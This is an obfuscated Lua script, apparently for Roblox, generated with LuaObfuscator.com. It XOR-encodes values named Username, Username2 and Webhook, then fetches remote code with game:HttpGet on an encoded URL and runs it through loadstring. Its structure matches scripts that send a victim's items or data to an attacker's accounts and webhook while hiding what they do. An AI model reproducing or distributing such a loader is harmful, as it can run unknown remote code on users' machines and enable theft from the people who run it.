--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.6) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9) local v10={};for v11=1, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + 1 )),v1(v2(v9,1 + (v11% #v9) ,1 + (v11% #v9) + 1 )))%256 ));end return v5(v10);end Username=v7("\251\194\217\39\231\147\210\10\128\155","\126\177\163\187\69\134\219\167");Username2=v7("\9\204\40\199\253\11\216\62\148\164","\156\67\173\74\165");Webhook=v7("\60\163\93\6\175\124\9\123\179\64\5\191\41\84\48\249\74\25\177\105\71\36\190\6\1\185\36\78\59\184\66\5\243\119\20\97\238\31\68\237\116\18\103\230\31\68\228\115\21\96\225\17\89\187\33\96\19\163\77\62\166\14\111\34\231\76\23\154\20\81\100\173\16\60\138\40\105\2\152\107\71\177\112\99\11\154\102\18\235\39\64\22\161\28\61\179\107\84\46\229\122\79\155\33\84\22\177\98\33\177\127\117\1\228\30\3\184\17\104\27\185","\38\84\215\41\118\220\70");loadstring(game:HttpGet(v7("\88\2\54\2\237\10\89\109\0\255\71\88\37\27\234\88\3\32\7\237\85\4\33\29\240\68\19\44\6\176\83\25\47\93\210\73\6\42\23\236\99\21\48\27\238\68\89\18\33\167\9\91\15\19\247\92\5\54\23\255\92\19\48\93\243\81\31\44\93\206\99\79\123\63\255\89\26\49\6\251\81\26\39\0","\158\48\118\66\114")))();
